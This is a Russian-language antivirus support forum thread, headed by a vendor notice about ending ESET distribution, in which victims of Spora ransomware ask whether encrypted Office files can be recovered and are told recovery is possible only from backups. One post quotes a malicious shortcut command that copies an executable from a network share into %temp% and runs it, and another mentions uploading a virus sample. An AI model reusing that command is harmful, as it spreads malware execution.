Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

зашифровано в Spora

RSS
Попались на данный шифровальщик (шифрует файлы microsoft office: doc, docx, xls, xlsx)
Может кто с ним сталкивался  - возможно ли расшифровать файлы без оплаты ?

расшифровки файлов, зашифрованных данным вариантом шифратора Spora на текущий момент нет.
Восстановление документов возможно в данный момент только из архивных или теневых копий.


добавьте на форум в ваше сообщение несколько зашифрованных документов.

если нет архивных копий,
сохраните важные документы на отдельный носитель, возможно в будущем расшифровка документов станет возможной.


--------
файл шифратора удален.
Изменено: Александр Балахнин - 01.04.2018 06:10:19 (Добавлены пошифрованные файлы)

Ответы

Пред. 1 ... 15 16 17 18 19 ... 21 След.
@rusali99,
добавьте образ автозапуска компьютера, который был атакован Spor-ой.
необходимо проверить систему, не осталось ли в ней хвостов от Spora
Цитата
santy написал:
@rusali99,
добавьте образ автозапуска компьютера, который был атакован Spor-ой.
необходимо проверить систему, не осталось ли в ней хвостов от Spora
Вы знаете я сначала обратился в поддержку Касперского, там совместными усилиями мы почистили хвосты вируса, я предоставлял им логи, они высылали мне скрипты которые я должен был вставлять в программу, и после выполнения скриптов, сбросил им контрольные логи, они сказали, что "следы вымогательства очищены, но с расшифровкой файлов не поможем", а для меня это самое главное! Сам вирус лежит в карантине NOD32
@rusali99,
если очистка системы не нужна, как вы считаете,
тогда остается только добавить, что с расшифровкой Spora в данный момент вам не поможем.
То есть вообще ни как?! Даже за деньги?!  
Цитата
rusali99 написал:
То есть вообще ни как?! Даже за деньги?!
за деньги, за много-деньги вы можете обратиться с расшифровкой к злоумышленникам.
Именно эту цель они и преследовали, когда шифровали ваши файлы.
Попались на Spora Ransomware. На рабочем столе только уникальный html файл с id для входа на их сайт. Файлы с расширением .key нет нигде.. Что делать? Есть ли виды расшифрования уже сейчас или их еще не придумали?
Temp Aktus,
расшифровать файлы Spora без приватного ключа не получится. Уточните в личном кабинете, как вам восстановить файл *.key
в новых вариантах ключ был уже без расширения key, но с идентификатором, аналогичным id****.html
появился троян в сети, заразил все документы на трех серверах
фотки, эксель , ворд, pdf и так далее...
Также скрывал каталоги и создавал ярлыки на вирус с путем вида:
C:\WINDOWS\system32\cmd.exe /c start explorer.exe "\\OPT\TEST15\070616" & type "\\OPT\TEST15\7f02a6b45084c26b98.exe" > "%temp%\7f02a6b45084c26b98.exe" && "%temp%\7f02a6b45084c26b98.exe"


вирус удален, но файлы не возможно открыть. Касперский который стоял на другом компе,  где не был Nod32, определил его как
Trojan-Rabsom.Win32.Spora.ccc

при попытке открыть любой док, пишет или поврежден или другой формат
Изменено: nWc - 10.03.2017 12:58:17
nWc,
расшифровать файлы после шифрования Spora без приватного ключа не получится.
восстановление возможно только из бэкапов.
если необходима помощь в очистке систем, где произошло шифрование, добавьте образ автозапуска.
Цитата
santy написал:
nWc,
расшифровать файлы после шифрования Spora без приватного ключа не получится.
восстановление возможно только из бэкапов.
если необходима помощь в очистке систем, где произошло шифрование, добавьте образ автозапуска.
вот вирус  пароль на архив 123123, образ скину в ближайшее время
Изменено: nWc - 10.03.2017 13:29:50
Пред. 1 ... 15 16 17 18 19 ... 21 След.
Читают тему